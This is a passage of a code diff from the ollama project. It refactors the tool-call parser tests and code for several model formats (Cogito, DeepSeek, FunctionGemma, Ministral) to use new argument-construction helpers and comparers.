t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String())
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(expectedToolCalls, finalToolCalls); diff != "" {
|
if diff := cmp.Diff(expectedToolCalls, finalToolCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -367,7 +367,7 @@ func TestCogitoParser_StreamingEdgeCases(t *testing.T) {
|
||||||
t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String())
|
t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String())
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls); diff != "" {
|
if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -412,9 +412,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -427,11 +427,11 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_data",
|
Name: "process_data",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"items": []any{"item1", "item2"},
|
"items": []any{"item1", "item2"},
|
||||||
"config": map[string]any{"enabled": true},
|
"config": map[string]any{"enabled": true},
|
||||||
"count": 42.0,
|
"count": 42.0,
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -444,7 +444,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "no_args_tool",
|
Name: "no_args_tool",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -493,9 +493,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -511,10 +511,10 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
"units": "metric",
|
"units": "metric",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -527,13 +527,13 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "complex_tool",
|
Name: "complex_tool",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"nested": map[string]any{
|
"nested": map[string]any{
|
||||||
"deep": map[string]any{
|
"deep": map[string]any{
|
||||||
"value": 123.0,
|
"value": 123.0,
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
expectError: false,
|
expectError: false,
|
||||||
|
|
@ -557,7 +557,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
||||||
t.Fatalf("unexpected error: %v", err)
|
t.Fatalf("unexpected error: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expected, result); diff != "" {
|
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" {
|
||||||
t.Errorf("tool call mismatch (-want +got):\n%s", diff)
|
t.Errorf("tool call mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
|
||||||
|
|
@ -51,9 +51,9 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -67,17 +67,17 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -97,10 +97,10 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_data",
|
Name: "process_data",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"items": []interface{}{"item1", "item2"},
|
"items": []interface{}{"item1", "item2"},
|
||||||
"config": map[string]interface{}{"enabled": true, "threshold": 0.95},
|
"config": map[string]interface{}{"enabled": true, "threshold": 0.95},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -115,9 +115,9 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -162,9 +162,9 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -191,10 +191,10 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"query": "北京天气",
|
"query": "北京天气",
|
||||||
"language": "中文",
|
"language": "中文",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -220,10 +220,10 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "execute_command",
|
Name: "execute_command",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"done\"",
|
"command": "ls && echo \"done\"",
|
||||||
"path": "/home/user",
|
"path": "/home/user",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -244,7 +244,7 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "ping",
|
Name: "ping",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -276,7 +276,7 @@ func TestDeepSeekParser(t *testing.T) {
|
||||||
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expectedCalls, calls); diff != "" {
|
if diff := cmp.Diff(tt.expectedCalls, calls, argsComparer); diff != "" {
|
||||||
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -313,9 +313,9 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -342,7 +342,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -375,10 +375,10 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calc",
|
Name: "calc",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"x": float64(42),
|
"x": float64(42),
|
||||||
"y": float64(24),
|
"y": float64(24),
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -414,7 +414,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
||||||
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expectedCalls, allCalls); diff != "" {
|
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -469,7 +469,7 @@ func TestDeepSeekParser_Init(t *testing.T) {
|
||||||
|
|
||||||
returnedTools := parser.Init(tools, nil, &api.ThinkValue{Value: true})
|
returnedTools := parser.Init(tools, nil, &api.ThinkValue{Value: true})
|
||||||
|
|
||||||
if diff := cmp.Diff(tools, returnedTools); diff != "" {
|
if diff := cmp.Diff(tools, returnedTools, toolsComparer); diff != "" {
|
||||||
t.Errorf("Init() returned tools mismatch (-want +got):\n%s", diff)
|
t.Errorf("Init() returned tools mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -492,9 +492,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -504,10 +504,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_data",
|
Name: "process_data",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"items": []interface{}{"a", "b"},
|
"items": []interface{}{"a", "b"},
|
||||||
"config": map[string]interface{}{"enabled": true},
|
"config": map[string]interface{}{"enabled": true},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -517,7 +517,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "ping",
|
Name: "ping",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -527,9 +527,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "获取天气",
|
Name: "获取天气",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"城市": "北京",
|
"城市": "北京",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -539,10 +539,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "execute",
|
Name: "execute",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"done\"",
|
"command": "ls && echo \"done\"",
|
||||||
"path": "/home/user",
|
"path": "/home/user",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -552,11 +552,11 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"x": 3.14,
|
"x": 3.14,
|
||||||
"y": float64(42),
|
"y": float64(42),
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -577,9 +577,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
expected: api.ToolCall{
|
expected: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "",
|
Name: "",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"arg": "value",
|
"arg": "value",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -606,7 +606,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
||||||
t.Fatalf("Unexpected error: %v", err)
|
t.Fatalf("Unexpected error: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(tt.expected, result); diff != "" {
|
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" {
|
||||||
t.Errorf("parseToolCallContent() mismatch (-want +got):\n%s", diff)
|
t.Errorf("parseToolCallContent() mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
|
||||||
|
|
@ -166,7 +166,7 @@ func (p *FunctionGemmaParser) parseToolCall(content string) (api.ToolCall, error
|
||||||
|
|
||||||
// parseArguments parses the key:value,key:value format
|
// parseArguments parses the key:value,key:value format
|
||||||
func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctionArguments {
|
func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctionArguments {
|
||||||
args := make(api.ToolCallFunctionArguments)
|
args := api.NewToolCallFunctionArguments()
|
||||||
if argsStr == "" {
|
if argsStr == "" {
|
||||||
return args
|
return args
|
||||||
}
|
}
|
||||||
|
|
@ -185,7 +185,7 @@ func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctio
|
||||||
value := part[colonIdx+1:]
|
value := part[colonIdx+1:]
|
||||||
|
|
||||||
// Parse the value
|
// Parse the value
|
||||||
args[key] = p.parseValue(value)
|
args.Set(key, p.parseValue(value))
|
||||||
}
|
}
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
|
||||||
|
|
@ -3,6 +3,7 @@ package parsers
|
||||||
import (
|
import (
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
|
"github.com/google/go-cmp/cmp"
|
||||||
"github.com/ollama/ollama/api"
|
"github.com/ollama/ollama/api"
|
||||||
"github.com/stretchr/testify/assert"
|
"github.com/stretchr/testify/assert"
|
||||||
)
|
)
|
||||||
|
|
@ -36,9 +37,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}},
|
"city": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -47,7 +48,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -66,7 +67,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -84,7 +85,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "add",
|
Name: "add",
|
||||||
Arguments: api.ToolCallFunctionArguments{"a": int64(1), "b": int64(2)},
|
Arguments: testArgs(map[string]any{"a": int64(1), "b": int64(2)}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -102,7 +103,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_flag",
|
Name: "set_flag",
|
||||||
Arguments: api.ToolCallFunctionArguments{"enabled": true, "verbose": false},
|
Arguments: testArgs(map[string]any{"enabled": true, "verbose": false}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -124,13 +125,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "London"},
|
Arguments: testArgs(map[string]any{"city": "London"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -152,7 +153,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process",
|
Name: "process",
|
||||||
Arguments: api.ToolCallFunctionArguments{"items": []any{"a", "b", "c"}},
|
Arguments: testArgs(map[string]any{"items": []any{"a", "b", "c"}}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -173,9 +174,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "update",
|
Name: "update",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"data": map[string]any{"name": "test", "value": int64(42)},
|
"data": map[string]any{"name": "test", "value": int64(42)},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -198,7 +199,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_time",
|
Name: "get_time",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -224,7 +225,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_temp",
|
Name: "set_temp",
|
||||||
Arguments: api.ToolCallFunctionArguments{"value": 3.14},
|
Arguments: testArgs(map[string]any{"value": 3.14}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -242,7 +243,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -261,7 +262,7 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "greet",
|
Name: "greet",
|
||||||
Arguments: api.ToolCallFunctionArguments{"name": "日本語"},
|
Arguments: testArgs(map[string]any{"name": "日本語"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -281,11 +282,11 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"query": "test",
|
"query": "test",
|
||||||
"limit": int64(10),
|
"limit": int64(10),
|
||||||
"offset": int64(0),
|
"offset": int64(0),
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -308,14 +309,14 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "create",
|
Name: "create",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"config": map[string]any{
|
"config": map[string]any{
|
||||||
"settings": map[string]any{
|
"settings": map[string]any{
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
"name": "test",
|
"name": "test",
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -345,13 +346,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_time",
|
Name: "get_time",
|
||||||
Arguments: api.ToolCallFunctionArguments{"timezone": "UTC"},
|
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -372,13 +373,13 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "first",
|
Name: "first",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "second",
|
Name: "second",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -411,7 +412,9 @@ func TestFunctionGemmaParser(t *testing.T) {
|
||||||
}
|
}
|
||||||
|
|
||||||
assert.Equal(t, tt.expectedText, allContent)
|
assert.Equal(t, tt.expectedText, allContent)
|
||||||
assert.Equal(t, tt.expectedCalls, allCalls)
|
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" {
|
||||||
|
t.Errorf("calls mismatch (-want +got):\n%s", diff)
|
||||||
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -112,8 +112,8 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
|
||||||
before, _ := splitAtTag(&p.buffer, "}", false)
|
before, _ := splitAtTag(&p.buffer, "}", false)
|
||||||
before += "}"
|
before += "}"
|
||||||
|
|
||||||
var data map[string]any
|
var args api.ToolCallFunctionArguments
|
||||||
if err := json.Unmarshal([]byte(before), &data); err != nil {
|
if err := json.Unmarshal([]byte(before), &args); err != nil {
|
||||||
// todo - throw a better error
|
// todo - throw a better error
|
||||||
return "", "", calls, err
|
return "", "", calls, err
|
||||||
}
|
}
|
||||||
|
|
@ -123,7 +123,7 @@ func (p *MinistralParser) Add(s string, done bool) (content string, thinking str
|
||||||
call := api.ToolCall{
|
call := api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: p.currentTool.Function.Name,
|
Name: p.currentTool.Function.Name,
|
||||||
Arguments: api.ToolCallFunctionArguments(data),
|
Arguments: args,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
calls = append(calls, call)
|
calls = append(calls, call)
|
||||||
|
|
|
||||||
|
|
@ -225,7 +225,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
|
||||||
